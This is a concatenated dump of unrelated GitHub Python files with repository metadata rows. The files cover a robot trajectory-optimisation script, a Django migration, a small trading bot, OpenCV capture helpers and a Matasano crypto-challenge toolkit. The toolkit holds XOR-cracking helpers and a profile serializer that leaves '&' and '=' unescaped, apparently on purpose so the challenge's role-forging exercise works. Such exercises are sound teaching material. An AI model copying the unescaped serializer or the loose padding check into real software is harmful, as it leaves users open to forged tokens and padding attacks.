return request
def CalcKneeAnkleAngles(self, hip_trans, knee_trans, ankle_trans):
l1 = np.linalg.norm(knee_trans[0:3,3] - ankle_trans[0:3,3])
l2 = np.linalg.norm(hip_trans[0:3,3] - knee_trans[0:3,3])
p2x = hip_trans[0,3]
p2y = hip_trans[1,3]
#q2 calculation
c2 = (p2x**2 + p2y**2 - l1**2 - l2**2)/(2*l1*l2)
s2_1 = np.sqrt(1-c2**2)
s2_2 = -np.sqrt(1-c2**2)
s2 = s2_1
q2 = np.arctan2(s2_1, c2)
if (q2 < 0):
s2 = s2_2
q2 = np.arctan2(s2_2, c2)
#q1 calculation
det = (l1**2 + l2**2 + (2*l1*l2*c2))
s1 = (p2y*(l1+l2*c2) - p2x*l2*s2)/det
c1 = (p2x*(l1+l2*c2) + p2y*l2*s2)/det
q1 = np.arctan2(s1,c1)
return q1,q2
if __name__ == "__main__":
env = Environment()
env.SetViewer('qtcoin')
env.Reset()
env.Load("/home/anto/ebolabot_ws/src/task_breakdown_openrave/src/task_breakdown_openrave/kinbodies_robots_envs/human_test.env.xml")
time.sleep(0.1)
utils = Utilities()
ht = HumanTrajopt()
ht.generate_cost_regions()
support_path = [np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.43935400e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 1.90673274e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.43966000e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.44859184e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -3.64438239e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.43918493e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.45782661e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -8.68824824e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.44161176e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.46704921e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 5.18953957e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.44693812e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.47625052e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 5.18953957e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.45515873e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.48597668e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 3.29451152e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.27259951e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.49390442e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -3.64438239e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.08676014e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50000290e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -1.05832763e-16],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.89934116e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50425743e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -5.03216117e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.71206335e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50666961e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -7.80771873e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.52665244e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50725727e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 3.29451152e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.34482372e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50605433e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -5.03216117e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.16826688e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50311047e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 5.18953957e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.99863093e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.49849071e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 1.90673274e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.83750959e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.49227478e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 3.29451152e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.68642708e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50995946e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 5.18953957e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.73983830e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.52727387e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -8.68824824e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.80424842e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.54414968e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -2.25660360e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.87940325e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.56052030e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 1.90673274e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.96500620e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.57632110e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 3.29451152e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.06071941e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.59789082e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -7.80771873e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.33132057e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.61643961e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -1.61343914e-16],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.62000174e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.63178582e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -6.41993995e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.92300731e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])]
InitOpenRAVELogging()
robot = env.GetRobots()[0]
head = robot.GetLink('Head')
print 'head_transform'
print head.GetTransform()
manip = robot.SetActiveManipulator("torso")
robot.SetActiveDOFs(manip.GetArmIndices())
ikmodel = openravepy.databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterizationType.Transform6D)
if not ikmodel.load():
ikmodel.autogenerate()
print ('done torso manip')
print 'MANIP DOFS', robot.GetActiveDOFIndices()
# manip = robot.SetActiveManipulator("base")
# robot.SetActiveDOFs(manip.GetArmIndices())
# ikmodel = openravepy.databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterizationType.Transform6D)
# if not ikmodel.load():
# ikmodel.autogenerate()
# print ('done base manip')
# manip = robot.SetActiveManipulator("knee")
# robot.SetActiveDOFs(manip.GetArmIndices())
# ikmodel = openravepy.databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterizationType.Transform6D)
# if not ikmodel.load():
# ikmodel.autogenerate()
# print ('done knee manip')
probs_cbirrt = RaveCreateProblem(env,'CBiRRT')
env.LoadProblem(probs_cbirrt,'Human1')
serialized_transform = TransformMatrix.SerializeTransform(support_path[len(support_path)-1])
raw_input("Press enter to continue...")
handles = []
for sp in support_path:
sp[0:3,3] += np.array([0.034094, 0.004925, 0.088688])
sp[0:3,3] += np.array([-0.026786, 0, 0])
handles.append(env.plot3(points=sp[0:3,3],
pointsize=5.0,
colors=array(((0,1,0)))))
raw_input("Press enter to continue...")
# for i in range(0, len(support_path)):
# pt = np.copy(support_path[i])
# pt[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
# pt[0:3,3] -= np.array([-0.026786, 0, 0])
# serialized_transform = TransformMatrix.SerializeTransform(pt)
# with env:
# startik = str2num(probs_cbirrt.SendCommand('DoGeneralIK exec nummanips 1 maniptm 0 %s'%serialized_transform))
# print ('ik solution \n', startik)
# raw_input("Press enter to continue...")
# gr = GogglesRobot()
# goggles = env.GetRobots()[1]
# gr.Init(env, goggles)
# goggles.SetActiveDOFValues([0])
# gr.Collapse()
head_transform = manip.GetEndEffector().GetTransform()
new_head_transform = np.copy(head_transform)
new_head_transform[0,3] += 0.2
new_head_transform[2,3] -= 0.1
baxter = env.GetRobots()[1]
b_manip = baxter.SetActiveManipulator("rightarm")
b_sol = []
goggles_trans = np.array([[ -6.12323400e-17, -7.49879891e-33, 1.00000000e+00, 1.15732000e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 0.00000000e+00],
[ 1.00000000e+00, 1.22464680e-16, 6.12323400e-17, 7.32410000e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]
)
with env:
b_sol = ku.ik_for_link(goggles_trans, b_manip, b_manip.GetEndEffector().GetName(),
filter_options = IkFilterOptions.IgnoreEndEffectorCollisions,
return_all_solns = True)
if (len(b_sol) > 0):
baxter.SetActiveDOFs(b_manip.GetArmIndices())
baxter.SetActiveDOFValues(b_sol[0])
# sol = []
# with env:
# sol = ku.ik_for_link(new_head_transform, manip, manip.GetEndEffector().GetName(),
# filter_options = IkFilterOptions.IgnoreSelfCollisions | IkFilterOptions.CheckEnvCollisions,
# return_all_solns = True)
# print "solutions",sol
# for s in sol:
# with env:
# robot.SetActiveDOFs(manip.GetArmIndices())
# robot.SetActiveDOFValues(s)
# raw_input("Press enter to continue...")
# hr = HumanRobot()
# hr.Init(env, robot)
# hr.TestTrajopt()
# generate_ik_solver('/home/anto/ebolabot_ws/src/task_breakdown_openrave/src/task_breakdown_openrave/human_bio_two_arms_mod.xml',
# '/home/anto/ebolabot_ws/src/task_breakdown_openrave/src/task_breakdown_openrave/human_head_ik.cpp', )
raw_input("Press enter to continue...")
manip = robot.SetActiveManipulator("torso")
target = support_path[len(support_path)-1]
target[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
target[0:3,3] -= np.array([-0.026786, 0, 0])
sol = ku.ik_for_link(target, manip, manip.GetEndEffector().GetName(),
filter_options = IkFilterOptions.IgnoreSelfCollisions | IkFilterOptions.CheckEnvCollisions,
return_all_solns = False)
request = make_fullbody_request(support_path[len(support_path)-1], len(support_path), "torso", sol)
c_waypoints = []
# for i in range(0, len(support_path)-1):
# waypoint = np.copy(support_path[i])
# waypoint[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
# waypoint[0:3,3] -= np.array([-0.026786, 0, 0])
# c_waypoints.append(waypoint)
# request = ExtendTrajoptRequest(request, c_waypoints)
print request
s = json.dumps(request) # convert dictionary into json-formatted string
cost_handles = []
with env:
prob = trajoptpy.ConstructProblem(s, env) # create object that stores optimization problem
waypoints = []
for i in range(0, len(support_path)-1):
waypoint = np.copy(support_path[i])
waypoint[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
waypoint[0:3,3] -= np.array([-0.026786, 0, 0])
waypoints.append(waypoint)
co = CostObject()
co.Init(waypoint, None, env, robot, utils, manip, None, None)
if (i > 0):
co.parent_node = cost_handles[i-1]
co.parent_node.child_node = co
cost_handles.append(co)
prob.AddCost(co.TaskDeviationCost, [(i,j) for j in xrange(7)], "ABS")#, "up%i"%t)
prob.AddCost(ht.get_gradient_cost, [(i,j) for j in xrange(7)], "ABS")
traj = None
with env:
result = trajoptpy.OptimizeProblem(prob) # do optimization
traj = result.GetTraj()
print traj
robot.SetActiveDOFs(manip.GetArmIndices())
for t in traj:
with env:
robot.SetActiveDOFValues(t)
pt = manip.GetEndEffector().GetTransform()
pt[0:3,3] += np.array([0.034094, 0.004925, 0.088688])
pt[0:3,3] += np.array([-0.026786, 0, 0])
handles.append(env.plot3(points=pt[0:3,3],
pointsize=5.0,
colors=array(((0,0,1)))))
raw_input("Press enter to continue...")
# for sp_trans in support_path:
# sp = np.copy(sp_trans)
# sp[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
# sp[0:3,3] -= np.array([-0.026786, 0, 0])
# # sp[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
# manip = robot.SetActiveManipulator("torso")
# sol = []
# with env:
# sol = ku.ik_for_link(sp, manip, manip.GetEndEffector().GetName(),
# filter_options = IkFilterOptions.IgnoreSelfCollisions | IkFilterOptions.CheckEnvCollisions,
# return_all_solns = False)
# if (len(sol) > 0):
# with env:
# robot.SetActiveDOFs(manip.GetArmIndices())
# robot.SetActiveDOFValues(sol)
# else:
# manip = robot.SetActiveManipulator("base")
# with env:
# sol = ku.ik_for_link(sp, manip, manip.GetEndEffector().GetName(),
# filter_options = IkFilterOptions.IgnoreSelfCollisions | IkFilterOptions.CheckEnvCollisions,
# return_all_solns = False)
# if (len(sol) > 0):
# with env:
# robot.SetActiveDOFs(manip.GetArmIndices())
# robot.SetActiveDOFValues(sol)
# pt = manip.GetEndEffector().GetTransform()
# pt[0:3,3] += np.array([0.034094, 0.004925, 0.088688])
# pt[0:3,3] += np.array([-0.026786, 0, 0])
# handles.append(env.plot3(points=pt[0:3,3],
# pointsize=5.0,
# colors=array(((0,0,1)))))
# raw_input("Press enter to continue...")
raw_input("Press enter to exit...") | [
"noreply@github.com"
] | Anto09.noreply@github.com |
2ea5c5280dcf41d96d593b8f51556663175988df | f8f894b4cb099aa5c3ce0039270f74d390833604 | /tools/generate_town_table.py | 50eaa1a35d785cd8037672236ee28d55ca7fec91 | [
"BSD-3-Clause"
] | permissive | ommokazza/uwo_ps_tools | d7431908b3cf09ff661ddbd2ad7c56702cb8f72a | 34642e1ae42f873e424582f9406ef302375b3759 | refs/heads/master | 2020-03-29T22:11:14.004986 | 2018-10-16T02:54:52 | 2018-10-16T02:54:52 | 150,407,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,085 | py | """Generate python code for town table
"""
import os
def get_town_table(screenshot_dir):
"""Generate python code for town table
Its format is
table[town_name] = (nearby town1, nearby town2...nearby town5)
The length of tuple may be different depends on town.
Arguments:
screenshot_dir (str): Directory which have town_name directory
and label.
Return:
python code style string (str)
"""
result = "TOWNS_TABLE = {}\n"
for di in sorted(os.listdir(screenshot_dir)):
dir_path = screenshot_dir + "/" + di
if not os.path.isdir(dir_path):
continue
for f in os.listdir(dir_path):
if f.lower().endswith(".txt"):
result += "TOWNS_TABLE[("
lines = open(dir_path + "/" + f).read().splitlines()
for i in range(3, len(lines), 3):
result += "'%s', " % lines[i]
result = result[:-2] + ")]\\"
result += "\n= '%s'\n" % di
break
return result
| [
"ommokazza@gmail.com"
] | ommokazza@gmail.com |
df32af9fbc1f5ba6e2290693ebc1b070be6cf909 | d3ed8b2a0aa287858e4e459a8082194790f78d7d | /tools.py | 7f93cb01b004636b5a6f833164d62c43d2885d84 | [
"MIT"
] | permissive | kimvais/matasano | f4ac31d5947783a92c6169016f836ee0a622a1ec | 1f687505f11d36ef76810c1fcecf3178b68d75fd | refs/heads/master | 2020-05-17T05:42:24.720539 | 2014-08-21T20:05:01 | 2014-08-21T20:05:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,535 | py | import base64
from collections import Counter
import string
import logging
import math
import binascii
logger = logging.getLogger(__name__)
__author__ = 'kimvais'
def hex2base64(data):
return base64.b64encode(binascii.unhexlify(data))
def xorwith(data, key):
return '{:0x}'.format(int(data, 16) ^ int(key, 16))
def xorwith_char(data, char):
output = bytes(bytearray((a ^ char) for a in data))
return output
def english_freq(data, min_score=3):
frequencies = {'e': 12.02,
't': 9.10,
'a': 8.12,
'o': 7.68,
'i': 7.31,
'n': 6.95,
' ': 6.10,
's': 6.28,
'r': 6.02,
'h': 5.92,
'd': 4.32,
'l': 3.98,
'u': 2.88,
'c': 2.71,
'm': 2.61,
'f': 2.30,
'y': 2.11,
'w': 2.09,
'g': 2.03,
'p': 1.82,
'b': 1.49,
'v': 1.11,
'k': 0.69,
'x': 0.17,
'q': 0.11,
'j': 0.10,
'z': 0.07}
if not isinstance(data, (bytes, bytearray)):
data = binascii.unhexlify(data)
else:
data = data
candidate = None
best = min_score
for char in range(256):
output = xorwith_char(data, char)
freqs = Counter(output)
histogram = bytes(x[0] for x in freqs.most_common(13))
if not all(chr(c) in string.printable for c in histogram):
continue
score = 0
for k, v in frequencies.items():
score += freqs[ord(k)] * v
score = score / len(output)
if score > best:
logger.info('Found a candidate histogram: {} with score {} - {}'.format(bytes(histogram), score, output))
best = score
candidate = (output, char)
return candidate
def xor_with_key(data, key):
output = bytearray()
for i, c in enumerate(data):
key_idx = i % len(key)
output.append(key[key_idx] ^ c)
return bytes(output)
def hamming(a, b):
"""
Calculates the edit distance / hamming distance of two input streams a and b
:param a: bytes()
:param b: bytes()
:return: int()
"""
assert len(a) == len(b)
distances = (x ^ y for x, y in zip(a, b))
c = Counter()
for x in distances:
c.update(bin(x).lstrip('0b'))
return c['1']
def chunk_into(data, size):
ret = list()
for i in range(math.ceil(len(data) / size)):
ret.append(data[i * size:(i + 1) * size])
return ret
def pkcs7pad(data, blocksize):
assert isinstance(data, bytes)
padlen = blocksize - len(data) % blocksize
if padlen == 0:
padlen = blocksize
return data + padlen * bytes((padlen,))
def unpad(plain):
padding = plain[-plain[-1]:]
if len(set(padding)) != 1:
raise ValueError('Invalid padding: {}'.format(padding))
return plain[:-plain[-1]]
class UserProfile(dict):
def __init__(self, d):
super().__init__()
self.__dict__ = self
for k, v in d.items():
if not isinstance(v, (bytes, int)):
v = v.encode('ascii')
self[k] = v
def serialize(self):
return b'email=' + self.email + '&uid={}'.format(self.uid).encode('ascii') + b'&role=' + self.role
| [
"kimvais@ssh.com"
] | kimvais@ssh.com |
ef61049bf34a736fb12e8b3475ff866551f867b5 | 807e1b0425c175a7df61e71a77c1cb08e70306ad | /myapp/migrations/0005_auto_20201018_1403.py | 2845d8069981d82e24ffbb2fd0378078f0128bbe | [] | no_license | priyanshiparsana2502/Student_APP | 56c2d2d0d40a6da5fc070824e2acdbbf737249ee | 119bf4d56f0540038c5589e0c5cf907a46c6ad7c | refs/heads/main | 2023-05-10T15:08:40.066863 | 2021-06-14T15:49:26 | 2021-06-14T15:49:26 | 376,876,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 765 | py | # Generated by Django 3.1.2 on 2020-10-18 18:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myapp', '0004_order'),
]
operations = [
migrations.AddField(
model_name='course',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name='topic',
name='length',
field=models.IntegerField(default=12),
),
migrations.AlterField(
model_name='order',
name='order_status',
field=models.IntegerField(choices=[(0, 'Cancelled'), (1, 'Confirmed'), (2, 'On Hold')], default=1, max_length=1),
),
]
| [
"67198123+priyanshiparsana2502@users.noreply.github.com"
] | 67198123+priyanshiparsana2502@users.noreply.github.com |
31cd210929e689f0530b25d7533cfe7bcd9c01bd | e135f8fb38d1834a6a9d838b98c6641f204fc4a0 | /old/perpetual.py | ce758f54c84fc51a03c19b42b095a2106f783922 | [] | no_license | siyuan0/HexCambridge2021 | 7031e7faab4c2c39a3766fcaa4c012b421852634 | 5a44db16f7f247206b91e126abb91b885970a52f | refs/heads/master | 2023-02-23T08:38:43.226256 | 2021-01-24T17:26:22 | 2021-01-24T17:26:22 | 332,413,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,682 | py | from optibook.synchronous_client import Exchange
import logging
import time
logger = logging.getLogger('client')
logger.setLevel('ERROR')
print("Setup was successful.")
instrument_id1 = 'PHILIPS_A'
instrument_id2 = 'PHILIPS_B'
e = Exchange()
a = e.connect()
# Returns all current positions
# positions = e.get_positions()
# for p in positions:
# print(p, positions[p])
# print("-----------------------------")
# # print(e.get_outstanding_orders(p))
# # print("-----------------------------")
# print(e.get_last_price_book(p).asks)
# print(e.get_last_price_book(p).bids)
while True:
if len(e.get_last_price_book(instrument_id1).bids) == 0 or \
len(e.get_last_price_book(instrument_id1).asks) == 0 or \
len(e.get_last_price_book(instrument_id2).bids) == 0 or \
len(e.get_last_price_book(instrument_id2).asks) == 0:
time.sleep(0.25)
else:
A_best_bid = e.get_last_price_book(instrument_id1).bids[0].price
A_best_ask = e.get_last_price_book(instrument_id1).asks[0].price
B_best_bid = e.get_last_price_book(instrument_id2).bids[0].price
B_best_ask = e.get_last_price_book(instrument_id2).asks[0].price
# print(A_best_bid, A_best_ask, B_best_bid, B_best_ask)
if A_best_bid > B_best_ask:
A_best_bid_vol = e.get_last_price_book(instrument_id1).bids[0].volume
B_best_ask_vol = e.get_last_price_book(instrument_id2).asks[0].volume
volume = min(A_best_bid_vol, B_best_ask_vol)
result = e.insert_order(instrument_id1, price = A_best_bid, volume=volume, side='bid', order_type='limit')
result = e.insert_order(instrument_id2, price = B_best_ask, volume=volume, side='ask', order_type='limit')
print(f"Order Id: {result}")
if B_best_bid > A_best_ask:
A_best_ask_vol = e.get_last_price_book(instrument_id1).asks[0].volume
B_best_bid_vol = e.get_last_price_book(instrument_id2).bids[0].volume
volume = min(A_best_ask_vol, B_best_bid_vol)
result = e.insert_order(instrument_id2, price = B_best_bid, volume=volume, side='bid', order_type='limit')
result = e.insert_order(instrument_id1, price = A_best_ask, volume=volume, side='ask', order_type='limit')
print(f"Order Id: {result}")
time.sleep(0.25)
if len(e.get_outstanding_orders(instrument_id1)) != 0:
e.delete_orders(instrument_id1)
if len(e.get_outstanding_orders(instrument_id2)) != 0:
e.delete_orders(instrument_id2) | [
"sc2178@cam.ac.uk"
] | sc2178@cam.ac.uk |
d72ecdd7a3b850a399fcd9116f3c384b38b3d1d6 | 181e9cc9cf4e52fcc6e9979890cc5b41e7beb756 | /Module 1/06_Codes/06/06_Codes/managers.py | c2650fc77fbc09ebd2367a198a7481ec81ec29c4 | [
"MIT"
] | permissive | PacktPublishing/OpenCV-Computer-Vision-Projects-with-Python | ace8576dce8d5f5db6992b3e5880a717996f78cc | 45a9c695e5bb29fa3354487e52f29a565d700d5c | refs/heads/master | 2023-02-09T14:10:42.767047 | 2023-01-30T09:02:09 | 2023-01-30T09:02:09 | 71,112,659 | 96 | 72 | null | null | null | null | UTF-8 | Python | false | false | 6,862 | py | import cv2
import numpy
import pygame
import time
import utils
class CaptureManager(object):
def __init__(self, capture, previewWindowManager = None,
shouldMirrorPreview = False):
self.previewWindowManager = previewWindowManager
self.shouldMirrorPreview = shouldMirrorPreview
self._capture = capture
self._channel = 0
self._enteredFrame = False
self._frame = None
self._imageFilename = None
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
self._startTime = None
self._framesElapsed = long(0)
self._fpsEstimate = None
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, value):
if self._channel != value:
self._channel = value
self._frame = None
@property
def frame(self):
if self._enteredFrame and self._frame is None:
_, self._frame = self._capture.retrieve(channel = self.channel)
return self._frame
@property
def isWritingImage(self):
return self._imageFilename is not None
@property
def isWritingVideo(self):
return self._videoFilename is not None
def enterFrame(self):
"""Capture the next frame, if any."""
# But first, check that any previous frame was exited.
assert not self._enteredFrame, \
'previous enterFrame() had no matching exitFrame()'
if self._capture is not None:
self._enteredFrame = self._capture.grab()
def exitFrame(self):
"""Draw to the window. Write to files. Release the frame."""
# Check whether any grabbed frame is retrievable.
# The getter may retrieve and cache the frame.
if self.frame is None:
self._enteredFrame = False
return
# Update the FPS estimate and related variables.
if self._framesElapsed == 0:
self._startTime = time.time()
else:
timeElapsed = time.time() - self._startTime
self._fpsEstimate = self._framesElapsed / timeElapsed
self._framesElapsed += 1
# Draw to the window, if any.
if self.previewWindowManager is not None:
if self.shouldMirrorPreview:
mirroredFrame = numpy.fliplr(self._frame).copy()
self.previewWindowManager.show(mirroredFrame)
else:
self.previewWindowManager.show(self._frame)
# Write to the image file, if any.
if self.isWritingImage:
cv2.imwrite(self._imageFilename, self._frame)
self._imageFilename = None
# Write to the video file, if any.
self._writeVideoFrame()
# Release the frame.
self._frame = None
self._enteredFrame = False
def writeImage(self, filename):
"""Write the next exited frame to an image file."""
self._imageFilename = filename
def startWritingVideo(
self, filename,
encoding = cv2.cv.CV_FOURCC('I','4','2','0')):
"""Start writing exited frames to a video file."""
self._videoFilename = filename
self._videoEncoding = encoding
def stopWritingVideo(self):
"""Stop writing exited frames to a video file."""
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
def _writeVideoFrame(self):
if not self.isWritingVideo:
return
if self._videoWriter is None:
fps = self._capture.get(cv2.cv.CV_CAP_PROP_FPS)
if fps == 0.0:
# The capture's FPS is unknown so use an estimate.
if self._framesElapsed < 20:
# Wait until more frames elapse so that the
# estimate is more stable.
return
else:
fps = self._fpsEstimate
size = (int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),
int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)))
self._videoWriter = cv2.VideoWriter(
self._videoFilename, self._videoEncoding,
fps, size)
self._videoWriter.write(self._frame)
class WindowManager(object):
def __init__(self, windowName, keypressCallback = None):
self.keypressCallback = keypressCallback
self._windowName = windowName
self._isWindowCreated = False
@property
def isWindowCreated(self):
return self._isWindowCreated
def createWindow(self):
cv2.namedWindow(self._windowName)
self._isWindowCreated = True
def show(self, frame):
cv2.imshow(self._windowName, frame)
def destroyWindow(self):
cv2.destroyWindow(self._windowName)
self._isWindowCreated = False
def processEvents(self):
keycode = cv2.waitKey(1)
if self.keypressCallback is not None and keycode != -1:
# Discard any non-ASCII info encoded by GTK.
keycode &= 0xFF
self.keypressCallback(keycode)
class PygameWindowManager(WindowManager):
def createWindow(self):
pygame.display.init()
pygame.display.set_caption(self._windowName)
self._isWindowCreated = True
def show(self, frame):
# Find the frame's dimensions in (w, h) format.
frameSize = frame.shape[1::-1]
# Convert the frame to RGB, which Pygame requires.
if utils.isGray(frame):
conversionType = cv2.COLOR_GRAY2RGB
else:
conversionType = cv2.COLOR_BGR2RGB
rgbFrame = cv2.cvtColor(frame, conversionType)
# Convert the frame to Pygame's Surface type.
pygameFrame = pygame.image.frombuffer(
rgbFrame.tostring(), frameSize, 'RGB')
# Resize the window to match the frame.
displaySurface = pygame.display.set_mode(frameSize)
# Blit and display the frame.
displaySurface.blit(pygameFrame, (0, 0))
pygame.display.flip()
def destroyWindow(self):
pygame.display.quit()
self._isWindowCreated = False
def processEvents(self):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and \
self.keypressCallback is not None:
self.keypressCallback(event.key)
elif event.type == pygame.QUIT:
self.destroyWindow()
return | [
"prasadr@packtpub.com"
] | prasadr@packtpub.com |
